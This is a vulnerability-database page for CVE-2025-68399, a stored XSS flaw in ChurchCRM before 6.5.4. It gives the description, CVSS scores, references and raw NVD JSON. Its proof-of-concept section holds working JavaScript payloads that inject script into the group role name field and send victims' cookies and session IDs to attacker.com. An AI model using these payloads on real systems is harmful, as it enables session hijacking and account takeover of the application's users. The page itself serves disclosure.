CVE-2025-68399

Description

ChurchCRM is an open-source church management system. In versions prior to 6.5.4, there is a Stored Cross-Site Scripting (XSS) vulnerability within the GroupEditor.php page of the application. When a user attempts to create a group role, they can execute malicious JavaScript. However, for this to work, the user must have permission to view and modify groups in the application. Version 6.5.4 fixes the issue.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:churchcrm:churchcrm:*:*:*:*:*:*:*:* - VULNERABLE

ChurchCRM < 6.5.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-68399 PoC - ChurchCRM Stored XSS in GroupEditor.php // Author: Security Researcher // Target: ChurchCRM < 6.5.4 // Step 1: Authenticate with ChurchCRM using a low-privilege account with group management permissions // POST /session/login const loginPayload = { email: '[email protected]', password: 'password123' }; // Step 2: Navigate to GroupEditor.php and intercept the group role creation request // GET /GroupEditor.php?GroupID=<group_id> // Step 3: Inject malicious JavaScript in the group role name field // POST /GroupEditor.php const xssPayload = { GroupID: 1, Action: 'AddRole', // Stored XSS payload - will be executed when page is viewed RoleName: '<script>fetch("https://attacker.com/steal?cookie="+document.cookie)</script>', // Alternative payload - event handler RoleDescription: '" onmouseover="alert(document.domain)" x="' }; // Step 4: When other users visit GroupEditor.php, the XSS payload executes // The attacker's server receives the victim's cookies fetch('https://attacker.com/exploit', { method: 'POST', mode: 'no-cors', body: JSON.stringify({ cookie: document.cookie, url: window.location.href, session: document.cookie.match(/CRM_SESSID=([^;]+)/)[1] }) });

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-68399
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-68399
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-68399/
[4] VulDB https://vuldb.com/cve/CVE-2025-68399
[5] https://github.com/ChurchCRM/CRM/security/advisories/GHSA-gfxf-w4cg-c54j
[6] https://github.com/ChurchCRM/CRM/security/advisories/GHSA-gfxf-w4cg-c54j

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-68399", "sourceIdentifier": "[email protected]", "published": "2025-12-17T22:16:02.083", "lastModified": "2025-12-18T16:47:11.970", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ChurchCRM is an open-source church management system. In versions prior to 6.5.4, there is a Stored Cross-Site Scripting (XSS) vulnerability within the GroupEditor.php page of the application. When a user attempts to create a group role, they can execute malicious JavaScript. However, for this to work, the user must have permission to view and modify groups in the application. Version 6.5.4 fixes the issue."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:churchcrm:churchcrm:*:*:*:*:*:*:*:*", "versionEndExcluding": "6.5.4", "matchCriteriaId": "2CE715A5-9E36-4DC7-94BC-511C43F8F3C6"}]}]}], "references": [{"url": "https://github.com/ChurchCRM/CRM/security/advisories/GHSA-gfxf-w4cg-c54j", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/ChurchCRM/CRM/security/advisories/GHSA-gfxf-w4cg-c54j", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}